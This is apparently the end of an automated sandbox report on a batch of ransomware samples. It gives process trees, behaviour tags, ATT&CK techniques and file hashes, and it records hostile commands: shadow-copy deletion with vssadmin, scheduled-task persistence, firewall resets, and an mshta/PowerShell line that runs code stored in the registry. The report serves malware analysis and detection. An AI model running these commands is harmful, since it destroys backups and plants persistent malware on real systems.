C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g53⤵PID:39400
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g54⤵PID:39488
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g55⤵PID:37676
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g56⤵PID:36284
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g57⤵PID:7952
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g58⤵PID:7792
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g59⤵PID:1540
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g60⤵PID:29744
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g61⤵PID:2148
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g62⤵PID:24828
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g63⤵PID:22212
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g64⤵PID:19760
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g65⤵PID:15652
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g66⤵PID:5108
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g67⤵PID:41012
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g68⤵PID:28088
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g69⤵PID:17932
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g70⤵PID:52164
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g71⤵PID:13364
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g72⤵PID:11904
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g73⤵PID:51376
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g74⤵PID:49164
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" /SC ONLOGON /RL HIGHEST /F74⤵
- DcRat
- Luminosity
- Scheduled Task/Job: Scheduled Task
PID:47384
-
-
C:\Windows\SysWOW64\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet74⤵
- Interacts with shadow copies
PID:40588
-
-
C:\Windows\SysWOW64\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet74⤵
- Interacts with shadow copies
PID:10736
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exeTrojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of UnmapMainImage
PID:1480
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dpqs-bc856cfae44077f57b48b11285e922b4130a6479dfed1f43f89f2fc5b2ede094.exeTrojan-Ransom.Win32.Zerber.dpqs-bc856cfae44077f57b48b11285e922b4130a6479dfed1f43f89f2fc5b2ede094.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1608 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1608 -s 2084⤵
- Program crash
PID:40460
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exeTrojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1016 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exeTrojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exe4⤵
- Executes dropped EXE
PID:35460
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dwth-4a8a428ddc4db3aef5e7cb1893782787a0bef5dff708f2ef670ac29e1d83eb82.exeTrojan-Ransom.Win32.Zerber.dwth-4a8a428ddc4db3aef5e7cb1893782787a0bef5dff708f2ef670ac29e1d83eb82.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1588
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exeTrojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2300 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exeTrojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exe4⤵
- Executes dropped EXE
PID:27600
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.gdcf-7f2335466ecca7be6888f92b5ba260780ce0a38039ceb54ac99b0485b3b086de.exeTrojan-Ransom.Win32.Zerber.gdcf-7f2335466ecca7be6888f92b5ba260780ce0a38039ceb54ac99b0485b3b086de.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1616 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 1364⤵
- Program crash
PID:51672
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exeTrojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
PID:1836 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exeTrojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exe4⤵
- Executes dropped EXE
PID:40984
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exeTrojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
PID:700 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exeTrojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exe4⤵
- Executes dropped EXE
PID:41416
-
-
-
C:\Users\Admin\Desktop\00288\UDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exeUDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:796 -
C:\Users\Admin\Desktop\00288\UDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exeUDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:41088
-
-
-
C:\Users\Admin\Desktop\00288\UDS-Trojan-Ransom.Win32.CryptXXX.sb-3d0af672ee06451fe1a7c9a27c8f36f4ec492ea1196210425d24199456626022.exeUDS-Trojan-Ransom.Win32.CryptXXX.sb-3d0af672ee06451fe1a7c9a27c8f36f4ec492ea1196210425d24199456626022.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:968 -
C:\Users\Admin\AppData\Local\Temp\ebicabfbdfbcg.exeC:\Users\Admin\AppData\Local\Temp\ebicabfbdfbcg.exe 7/7/8/0/6/2/6/0/2/3/5 KElBRDc1LTAwHSpMTjpQQ0I3MB4sST5NT09MSUNEOy0bKD1BU05HPj0uHSo8Qjw9Kh4pUFBMP048TF9DQjcwHixOPktORUxdT1JKOmNtbWg6KS1tcnQrPz5MQy1OTUotP01LJ0JGRkkeKUNKRj5EQjw9Gi0+MTsqLBkoPDI3KysgLUEuNiYpIClCLj0rLhsoPS09Jy8aL05PSj1OO1RZTkxJVD4+UjYYL0pQSURTQE9YPk1MOzsaL05PSj1OO1RZTDtNQzobKD5QRVlTTEw7HSo+UT1fPUs+TEdLQDYZJ0hJUU5fQE9KUEw9UjczGi9SRTxHRFFPT11PUko6GyhPRT0sHilEUS44GShKVUhSQ01DXFI+RTtPR0NDTT9EQE5LRD0aLUNTXU9QR01BTT87bnJzYhsoSz1UT1BISUxEWk5MPVJZQjtZUTotGShAST5DUj0vHSpCTFdEU0w7TUdAWj5HO1JTTk5FQjphWmVrZRotPk9VS0dIOjxfQ043Mi41KSoqKC4zMSgxMC8bKE1BTT87KzQwNi4yLys0Mh4pRE1USUVIOURZUkNNQzovKCowLywuKzUoLiszLCo6LDYkUEsdKk46NVBzcmJvbCpwa2VkaVwjLGYwKzIZKE1SRjtidHJtICxaHTJgIyxmZWJvKicoMSsvXmVxZmJnJ2FuYG0fMmRPcGdNYW1fQml3bGlqWl1FYWhfYWVwXF9eaWRvcyMsZi8xLTIsMTYtMyolMGNfaHBmbGlfXm1fa1xgXmolLGQrNDA2LjIvKzUqIy1mNjMxLy8sNTMwLDlWLjRuRjxFMV90US9KTlxqQUdIYltXbTFGSg==4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:22872 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic /output:C:\Users\Admin\AppData\Local\Temp\81732038323.txt bios get serialnumber5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:41420
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic /output:C:\Users\Admin\AppData\Local\Temp\81732038323.txt bios get version5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3724
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic /output:C:\Users\Admin\AppData\Local\Temp\81732038323.txt bios get version5⤵
- System Location Discovery: System Language Discovery
PID:26852
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic /output:C:\Users\Admin\AppData\Local\Temp\81732038323.txt bios get version5⤵PID:13548
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic /output:C:\Users\Admin\AppData\Local\Temp\81732038323.txt bios get version5⤵PID:35864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 22872 -s 3685⤵
- Program crash
PID:38072
-
-
-
-
C:\Users\Admin\Desktop\00288\UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exeUDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe3⤵
- Drops startup file
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1548 -
C:\Windows\SysWOW64\netsh.exeC:\Windows\system32\netsh.exe advfirewall set allprofiles state on4⤵
- Modifies Windows Firewall
PID:9456
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\system32\netsh.exe advfirewall reset4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4860
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:2980
-
-
-
-
C:\Windows\syswow64\svchost.exe"C:\Windows\syswow64\svchost.exe"2⤵
- DcRat
- Modifies WinLogon for persistence
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:16040
-
-
C:\Windows\syswow64\svchost.exe"C:\Windows\syswow64\svchost.exe"2⤵
- DcRat
- Modifies WinLogon for persistence
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:41076
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Beni Oku.txt2⤵PID:27708
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵PID:6136
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵PID:21540
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵PID:39760
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵PID:39064
-
-
C:\Windows\System32\taskmgr.exe"C:\Windows\System32\taskmgr.exe"2⤵PID:23640
-
-
C:\Windows\System32\taskmgr.exe"C:\Windows\System32\taskmgr.exe"2⤵PID:20372
-
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:zz8k9V="ZdHerWBf";A2C4=new%20ActiveXObject("WScript.Shell");QG0Y6BIgd="z";rT2AI=A2C4.RegRead("HKCU\\software\\DrjFiX9\\Q6Y5e3W");tdG8B="V";eval(rT2AI);PF51zl="joLAHB1";1⤵
- Process spawned unexpected child process
PID:38664 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:mnnro2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5624 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: MapViewOfSection
PID:9496 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵PID:37156
-
-
-
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail.exe" -Embedding1⤵
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:35064
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:13332
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5681⤵PID:13528
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}1⤵PID:37136
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}1⤵PID:12692
-
C:\Windows\system32\taskeng.exetaskeng.exe {2540252C-8E05-48E7-8097-604762A6587C} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]1⤵PID:2360
-
C:\Program Files (x86)\Java\java.exe"C:\Program Files (x86)\Java\java.exe" /startup2⤵
- Maps connected drives based on registry
PID:32448 -
C:\Program Files (x86)\Java\java.exe"C:\Program Files (x86)\Java\java.exe" /startup3⤵PID:36040
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 8963⤵PID:36012
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}1⤵PID:44884
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}1⤵PID:42572
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1Impair Defenses
2Disable or Modify System Firewall
2Indicator Removal
3File Deletion
3Modify Registry
8Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
File and Directory Discovery
1Network Service Discovery
2Peripheral Device Discovery
2Query Registry
6Software Discovery
1System Information Discovery
5System Location Discovery
1System Language Discovery
1Virtualization/Sandbox Evasion
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5244b69871364e13d62834eb9932872d6
SHA1f61f6d2191f899b87b608af39102744a7b40123e
SHA2560512eea3feaffba5ff239bd17fdc94228e71e5dadba13e8bf59377db59375ae4
SHA5129c13004baa7da2f85dc341fd664579282034b83f457eac8a08afdd70a17e3ebf332c589d017bda93abf76888f0397fc17d1c1d73e2575d64048a0537210fe61f
-
Filesize
67KB
MD57b6759078e2e60bb4b1b68cd3eac7db0
SHA15e2a0ae39cc31a7071a91818b72295395d987e24
SHA25634919463af536f985d6cad1ff3fdc7c6371a68ce694332560fa02414b12aff8f
SHA512b8eab573b8a617188442853679ee49c43b6459e2f195eedf20b4668d537e32b806e335d3bbcbdd2f49b06cfa810a60c82d3410c69bc2253dc3b0a49ee2022be1
-
Filesize
2KB
MD5a3cfd45838d4e3d6afaea679e0f900e7
SHA128968b3ca3fa16a271ff725577beacacfe55f2f2
SHA256146bee66931c6116250194cce38e754975fd984b7d3bfd831405428548b49736
SHA512f2241ac7f23f646f537ad5d5e56ff121289fb7a3b52df507ba27fab9416a3a2818d1e2588e55a1fccd001ccd603a6b328326edccc6339d3505470cb2b664d58d
-
Filesize
7KB
MD5b351c1094f8bcfabbae7499dc4fad364
SHA1fdf386a7e4356ed023d49689e3fb19db36f8d6fb
SHA2567911bf550b90fad75b85fd5a5734b091b0f75762200a7d515ea85bb1ee9b3567
SHA512b37490a7da538cb71730d460c905d4c621800b2109db6937f5671e5a514db062013f108b1383045f2678d02b7081e6f9b65367900008d57d612be8d39038dac8
-
Filesize
65KB
MD5e9fe2e11bd7af727d96ef9d30cf94525
SHA16930c1d8903bbdaa86b1ddf507367105a296f9b6
SHA2562724bf1aa7855520f631fc17341e8eaf3220cb71d693f2f4042b5276f7fd032d
SHA512a697534b8d179e35444470c8e9c64a7ac5d6d28b1f960e2c8655f67652cb30082b495f1e937fc598ffc147e0bbe46c7a4ac03a516e5e5c1c5ad089daba5955c0
-
Filesize
1KB
MD507fbdcd81a00053017292e044187e7ab
SHA1efd564932e848689a09ee90a03e14af7fb80607b
SHA256352efbff454b70f58f6174ac4c36a8c50d9380395da1a044062bf947ace3c110
SHA512d782663426db09453d520c8c67b05f24e4b7dc93c29e6d87acc14244b95d7c61289f1132cd67b81d38dc97014d66efd771ab8ab0739a66739bc8bf378d900736
-
Filesize
9KB
MD552e0697419e95909236a263bf2996976
SHA1bfaadc4ed424f1127dd9d0d6c649cf2c276d925f
SHA256fe464ad823a75c8ff93ebda668d9363eec8d363912831d96644b1b07212048f0
SHA512629040ce3cd5b99394590833a5b06a281c0b3a53c35e63caab21dce759d69a75daaf4ddc81450dbde71d60de8cf343b9f33db36a13ccd430d8d27ac14ebc115c
-
Filesize
68KB
MD5e7e2ab2cdcc7d94b6000a63ce913ad6b
SHA173c6ad86e3f0ad7bcfe34599f51ecff6b86cfb83
SHA2564472cc75a1f30299ac1a1da76012cdead6fd94082f480658c2b324491e7c535c
SHA512347524febe5331013efe5253e5a256022b46395b128bff4a5b74f5f3d307195b85c016008ea5a1c7959fbd3f86dcd977e284d75ad7f1edb7e3d789f4a354b8f1
-
Filesize
2KB
MD5e0b9e29463e61b927748e007075b4628
SHA1acd9e42917b96098ca24f18ccb1f6b7c136a613d
SHA2567e9af776958d425e811989c3ac35e0723f23db562b914629a1747bf28c2e26c9
SHA51264d12c250ede170d8b76114cf4bce53ca9932bb94528620c0f489278f819aae912d1f7a3f6c19dbb5bd909bba0e388a7ac37fcc0c2c3b4d117252a26a49e95b9
-
Filesize
12KB
MD5dad08b91abf01894ca3c08e74929c04e
SHA19fbac63b5faada9211e404fef65ab80dfa652c65
SHA25638481501ea03b62d477f660cda642cfb4a4c9fd791944e0ba10434170c95cdd9
SHA51289a185cb6744683a1b15853026de30cc6e890674c9fc826f444a4c3c4e2cab016ffbda4a90c78d486c3eeb42f297a8130ed93d663dc38270916d53d16e84408b
-
Filesize
64KB
MD5d141fb305003bd92d3be316a31883643
SHA1edfd8aeec3a0f9e7a276ad2c71c5b3388df8f6d5
SHA2560bab47154e079fb7cd65a68c8dd98305325fd12eec67b84b7cdac5bf39d01edb
SHA5121f44d546c99578d5406a9a27ca80ef220b9e6a302a824426fa982f02fc5bcfff139648dd8acc99c1575920a179785d2691e6deb76eb603c9cd3b23cbd9d97e82
-
Filesize
1KB
MD5a465ad4da12094d53326e622f3afef01
SHA15f594e429eeff9557e1e8f14779db0c2c81ce963
SHA2560cea47ab9074b778d57a3bf12494617d6a41857cabfd49a56f83aef2dd40795e
SHA512829ea3cc6676ad1b8eb05bca9d7769c365eebb8f41579e3196a2f61c89b72a283d4ab892ff7bf13f7aca13ad032fe8a8c612b25833b7ffaf5e0bff4e43e74f0c
-
Filesize
7KB
MD57db7f409e6a5008692d0c51d120dc2f0
SHA1542ab2971f0e96045b078f18354002fe4f0f3e2f
